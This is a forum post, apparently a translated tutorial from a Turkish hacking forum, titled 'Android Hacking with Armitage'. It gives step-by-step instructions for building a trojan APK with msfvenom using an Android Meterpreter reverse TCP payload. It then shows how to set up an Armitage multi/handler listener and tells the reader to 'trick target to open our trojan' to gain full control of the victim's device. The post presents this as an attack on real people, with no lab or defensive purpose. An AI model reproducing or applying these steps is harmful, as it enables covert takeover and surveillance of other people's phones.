Android Hacking with Armitage

Durum
Üzgünüz bu konu cevaplar için kapatılmıştır...

Kullanıcı1233

Kıdemli Üye
19 Tem 2011
Hello guys. In this topic, i'll try to show you how to hack an Android device with Armitage.

What is Armitage?

Armitage is a software that uses Métasploit system but looks very different as theme.

How to Hack an Android Device?

First of all, find out what's the IP Address.

Kod:
ifconfig

3gR2j2.png

You can find it on inet: it's like 192.168.x.x don't forget! Now it's time to create a trojan. I'll use msfvenom but you can try different tools like thefatrat..

Kod:
msfvenom -p android/meterpreter/reverse_tcp LHOST=192.168.x.x LPORT=1234 -o tht.apk

yjn2Ry.png

LHOST = IP address that we just saw
LPORT = Port that we've opened earlier

And click 'Enter'. It's done. But still we need to listen it somehow. I'll use Armitage.

Kod:
armitage

RG6E96.png

When i clicked 'Enter', it asked this. Don't change anything, just click 'Connect'.

zyQ6zj.png

Choose 'Yes' to continue.

k0YZLA.png

It's opening.

8XEm2Q.png

It's open now and we see this interface. Time to listen our trojan.

DGko66.png

Choose exploit -> multi -> handler

DGko66.png

mR8q71.png

E2EQ68.png

Now we need to edit LHOST, LPORT, and PAYLOAD.

jAYz1n.png

We already know LHOST and LPORT, here is PAYLOAD:

Kod:
android/meterpreter/reverse_tcp

Then launch it!

2PQvNj.png

We can see the infos we just edited and it's starting to listen it. Next step, trick target to open our trojan.

Let's assume that you've done it successfully.

2PQvNj.png

oyzn8k.png

After then, you can do anything you wanna do. Just like msfconsole.

Original: https://www.turkhackteam.org/siber-guvenlik/1893953-armitage-ile-androide-sizalim-uchiha-sasuke.html
Translator: R4V3N

Durum
Üzgünüz bu konu cevaplar için kapatılmıştır...
Üst

Turkhackteam.org internet sitesi 5651 sayılı kanun’un 2. maddesinin 1. fıkrasının m) bendi ile aynı kanunun 5. maddesi kapsamında "Yer Sağlayıcı" konumundadır. İçerikler ön onay olmaksızın tamamen kullanıcılar tarafından oluşturulmaktadır. Turkhackteam.org; Yer sağlayıcı olarak, kullanıcılar tarafından oluşturulan içeriği ya da hukuka aykırı paylaşımı kontrol etmekle ya da araştırmakla yükümlü değildir. Türkhackteam saldırı timleri Türk sitelerine hiçbir zararlı faaliyette bulunmaz. Türkhackteam üyelerinin yaptığı bireysel hack faaliyetlerinden Türkhackteam sorumlu değildir. Sitelerinize Türkhackteam ismi kullanılarak hack faaliyetinde bulunulursa, site-sunucu erişim loglarından bu faaliyeti gerçekleştiren ip adresini tespit edip diğer kanıtlarla birlikte savcılığa suç duyurusunda bulununuz.